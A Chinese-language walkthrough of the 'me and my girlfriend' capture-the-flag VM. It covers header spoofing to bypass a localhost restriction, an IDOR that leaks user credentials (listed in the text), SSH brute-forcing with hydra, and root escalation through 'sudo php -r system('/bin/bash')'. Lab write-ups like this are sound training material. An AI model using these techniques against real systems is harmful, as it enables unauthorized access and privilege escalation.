me and my girlfriend
一个不错的练手靶机
靶机 : me and my girlfriend
渗透机 : kali + win10
补充 : 如果靶机自带的是nat网络 , 如果需要更改 , 别忘记啦 , 我忘记是什么啦
目标: 拿到flag1.txt flag2.txt
0x01. 信息收集
1. 确定靶机ip
扫描当前网段ip
kali 192.168.0.105 靶机 192.168.0.110
2. 扫描全端口
rustscan -a 192.168.0.110 -r 1-65535 -- -sV
这里用的是rustscan扫描的 , 当然你也可以用nmap
既然开放了 22 80 , 那么访问一下80端口 , 发现只允许本地访问 , 那么我们就简单的绕一下
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
不知道是哪个头获取的ip , 索性全加上吧
这样就有权限访问了 , 接下来就是简单的注册一个登录试一试
0x02. 漏洞探测
1. 漏洞验证
通过你多年的渗透经验 , 发现了一个uid参数 , 很有可能存在越权漏洞 , fuzz一下试试
细节 , 0-12
果然存在越权漏洞 , 获取到存在的账号和密码
user
alice
sundatea
aingmaung
abdikasepak
eweuhtandingan
sedihaingmah
passwd
4lic3
indONEsia
qwerty!!!
dorrrrr
skuyatuh
cedihhihihi
之前扫描出来一个22端口 , 尝试用这些账号和密码爆破一下
hydra -L ./user.txt -P ./passwd.txt -vV -f 192.168.0.110 ssh
最后爆出账密
alice 4lic3
然后就是ssh登录
2. 拿到shell
ssh alice@192.168.0.110
然后通过查看家目录的隐藏文件 , 找到一个我的秘密文件夹
根据提示 , 接下来就是提权进到root下找到最后的flag啦
0x03. 提权
1. 主机信息收集
提权的本质也就是根据主机的漏洞 , 进行权限提升 , 所以还是要信息收集的
GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
或者用这个提权辅助工具
https://github.com/mzet-/linux-exploit-suggester.git
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
上传Linux信息收集脚本发现一个sudoers提权方法 , 但是靶机无法调用gcc编译 , 所以看看有没有其他方法
2. php提权
sudo -l
https://gtfobins.github.io/gtfobins/php/#suid
sudo php -r "system('/bin/bash');"
顺利拿到第二个flag
Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}